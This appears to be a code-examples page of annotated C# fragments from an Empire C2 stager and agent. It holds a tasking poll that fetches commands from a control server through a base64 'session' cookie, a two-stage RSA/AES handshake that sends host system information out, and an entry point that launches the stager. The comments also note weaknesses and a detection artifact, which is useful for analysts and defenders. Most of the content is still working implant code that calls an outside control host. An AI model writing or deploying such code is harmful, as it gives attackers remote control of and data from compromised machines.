Ejemplo n.º 1
        ////////////////////////////////////////////////////////////////////////////////
        // GetTask: one tasking poll against the currently selected control server.
        //
        // Builds a routing packet, carries it base64-encoded in a "session" cookie
        // on an HTTP GET to a randomly chosen task URI, and returns the raw response
        // body. On a WebException the MissedCheckins counter is bumped and an empty
        // array is returned.
        //
        // Network artifact worth noting for detection: every poll is a GET whose
        // Cookie header is exactly "session=<base64 routing packet>" with the
        // User-Agent supplied by sessionInfo.
        //
        // Names used but defined elsewhere in the file: NewRoutingPacket,
        // sessionInfo, ServerIndex, MissedCheckins.
        ////////////////////////////////////////////////////////////////////////////////
        internal byte[] GetTask()
        {
            // Empty array is the "nothing received / request failed" result.
            byte[] results = new byte[0];
            try
            {
                // Second argument presumably a packet/metadata type selector — defined elsewhere, verify.
                byte[] routingPacket = NewRoutingPacket(null, 4);
                string routingCookie = Convert.ToBase64String(routingPacket);

                // WebClient is IDisposable but is never disposed here.
                WebClient webClient = new WebClient();
                // Honour the system proxy and authenticate to it with the current user's credentials.
                webClient.Proxy             = WebRequest.GetSystemWebProxy();
                webClient.Proxy.Credentials = CredentialCache.DefaultCredentials;
                webClient.Headers.Add("User-Agent", sessionInfo.GetUserAgent());
                // The routing packet travels in a cookie named "session".
                webClient.Headers.Add("Cookie", "session=" + routingCookie);

                // A new time-seeded Random per call; GetTaskURIs() is evaluated twice here.
                Random random          = new Random();
                string selectedTaskURI = sessionInfo.GetTaskURIs()[random.Next(0, sessionInfo.GetTaskURIs().Length)];
                // URL = control server selected by ServerIndex + task URI; body is returned as-is.
                results = webClient.DownloadData(sessionInfo.GetControlServers()[ServerIndex] + selectedTaskURI);
            }
            catch (WebException webException)
            {
                MissedCheckins++;
                // webException.Response is null when no HTTP response was received
                // (e.g. DNS or connection failure), in which case this cast throws a
                // NullReferenceException that is not caught by this handler.
                if ((int)((HttpWebResponse)webException.Response).StatusCode == 401)
                {
                    //Restart everything
                    // (intentionally empty in this listing — the 401 branch has no behaviour)
                }
            }
            return(results);
        }
Ejemplo n.º 2
        ////////////////////////////////////////////////////////////////////////////////
        // Stage2: second step of the staging handshake.
        //
        // Input:  stage1response — RSA-encrypted blob from the server.
        // Output: whatever SendStage returns for the 0x03 message.
        //
        // Wire layout of what is sent (as built below):
        //   IV (16 bytes) || AES(sessionKey, IV, systemInformation) || HMAC-SHA256(sessionKey, IV||ciphertext)[0..10)
        //
        // Throws (not handled here): CryptographicException if the RSA decrypt fails,
        // ArgumentOutOfRangeException from Substring if fewer than 16 characters
        // are decrypted, FormatException from Convert.ToInt64 if the nonce is not
        // a decimal integer.
        //
        // Names used but defined elsewhere in the file: rsaCrypto, sessionInfo,
        // GetSystemInformation, aesEncrypt, Misc.combine, SendStage.
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] Stage2(byte[] stage1response)
        {
            // System.Random is not a cryptographic RNG; it is used below to generate the IV.
            Random random = new Random();

            ////////////////////////////////////////////////////////////////////////////////
            // false = PKCS#1 v1.5 padding rather than OAEP.
            byte[] decrypted       = rsaCrypto.Decrypt(stage1response, false);
            string decryptedString = Encoding.ASCII.GetString(decrypted);
            // Plaintext layout: first 16 ASCII characters are the nonce, the rest is the session key.
            string nonce           = decryptedString.Substring(0, 16);

            sessionInfo.SetSessionKey(decryptedString.Substring(16, decryptedString.Length - 16));
            byte[] keyBytes = Encoding.ASCII.GetBytes(sessionInfo.GetSessionKey());

            ////////////////////////////////////////////////////////////////////////////////
            // The nonce is treated as a decimal integer and echoed back incremented by one,
            // which lets the server confirm the client could decrypt stage 1.
            long increment = Convert.ToInt64(nonce);

            increment++;
            nonce = increment.ToString();
            // Payload = "<nonce+1>|" prefix plus the comma-joined control server list; the
            // exact fields come from GetSystemInformation, which is not visible here.
            byte[] systemInformationBytes = GetSystemInformation(nonce + "|", string.Join(",", sessionInfo.GetControlServers()));
            byte[] initializationVector   = new byte[16];
            random.NextBytes(initializationVector);
            // AES mode/padding are decided inside aesEncrypt (defined elsewhere).
            byte[] encryptedInformationBytes = aesEncrypt(keyBytes, initializationVector, systemInformationBytes);
            // IV is prepended in the clear.
            encryptedInformationBytes = Misc.combine(initializationVector, encryptedInformationBytes);

            ////////////////////////////////////////////////////////////////////////////////
            // MAC over IV||ciphertext with the session key, truncated to its first 10 bytes
            // and appended (encrypt-then-MAC).
            using (HMACSHA256 hmac = new HMACSHA256())
            {
                hmac.Key = keyBytes;
                byte[] hmacHash = hmac.ComputeHash(encryptedInformationBytes).Take(10).ToArray();
                encryptedInformationBytes = Misc.combine(encryptedInformationBytes, hmacHash);
            }

            ////////////////////////////////////////////////////////////////////////////////
            // Unlike Stage1, only a relative path is passed here; whether SendStage prepends
            // a control server is not visible in this listing — verify.
            return(SendStage(0x03, encryptedInformationBytes, "/index.php"));
        }
Ejemplo n.º 3
        ////////////////////////////////////////////////////////////////////////////////
        // Stage1: first step of the staging handshake.
        //
        // Sends the client's RSA public key (XML form) to the first control server,
        // protected with the pre-shared staging key. Returns whatever SendStage
        // returns for the 0x02 message.
        //
        // Wire layout of what is sent (as built below):
        //   IV (16 bytes) || AES(stagingKey, IV, rsaPublicKeyXml) || HMAC-SHA256(stagingKey, IV||ciphertext)[0..10)
        //
        // Names used but defined elsewhere in the file: rsaCrypto, stagingKeyBytes,
        // aesEncrypt, Misc.combine, sessionInfo, SendStage.
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] Stage1()
        {
            // System.Random is not a cryptographic RNG; it is used below to generate the IV.
            Random random = new Random();

            ////////////////////////////////////////////////////////////////////////////////
            // false = export the public key only (no private parameters).
            string rsaKey = rsaCrypto.ToXmlString(false);

            byte[] rsaKeyBytes = Encoding.ASCII.GetBytes(rsaKey);

            ////////////////////////////////////////////////////////////////////////////////
            byte[] initializationVector = new byte[16];
            random.NextBytes(initializationVector);
            // AES mode/padding are decided inside aesEncrypt (defined elsewhere).
            byte[] encryptedBytes = aesEncrypt(stagingKeyBytes, initializationVector, rsaKeyBytes);
            // IV is prepended in the clear.
            encryptedBytes = Misc.combine(initializationVector, encryptedBytes);

            ////////////////////////////////////////////////////////////////////////////////
            // Not wrapped in a using block here, unlike the HMAC in Stage2.
            HMACSHA256 hmac = new HMACSHA256();

            hmac.Key = stagingKeyBytes;
            byte[] hmacBytes = hmac.ComputeHash(encryptedBytes);
            // Truncated MAC: only the first 10 bytes are appended (encrypt-then-MAC).
            encryptedBytes = Misc.combine(encryptedBytes, hmacBytes.Take(10).ToArray());

            ////////////////////////////////////////////////////////////////////////////////
            // Always targets the first control server; the server index is not consulted here.
            return(SendStage(0x02, encryptedBytes, sessionInfo.GetControlServers().First() + "/index.jsp"));
        }
Ejemplo n.º 4
        // Entry point. The SessionInfo source is chosen at compile time:
        //   COMMAND_LINE — built from at least three command-line arguments (exits silently otherwise);
        //   COMPILE_TIME — built from values baked in at build time.
        // Exactly one of the two symbols must be defined: with neither, sessionInfo is
        // undeclared; with both, it is declared twice.
        // PRINT adds a console dump of the session parameters before execution.
        static void Main(string[] args)
        {
#if (COMMAND_LINE)
            // Fewer than three arguments: exit without doing anything.
            if (args.Length < 3)
            {
                return;
            }
            SessionInfo sessionInfo = new SessionInfo(args);
#endif

#if (COMPILE_TIME)
            SessionInfo sessionInfo = new SessionInfo();
#endif

#if (PRINT)
            // GetControlServers() is indexed elsewhere in this file, so it is presumably a
            // collection; {0} on a collection prints its type name rather than its contents — verify.
            Console.WriteLine("EmpireServer:  {0}", sessionInfo.GetControlServers());
            Console.WriteLine("StagingKey:    {0}", sessionInfo.GetStagingKey());
            Console.WriteLine("AgentLanguage: {0}", sessionInfo.GetAgentLanguage());
#endif
            // EmpireStager is defined elsewhere; Execute() presumably runs the staging sequence.
            (new EmpireStager(sessionInfo)).Execute();
        }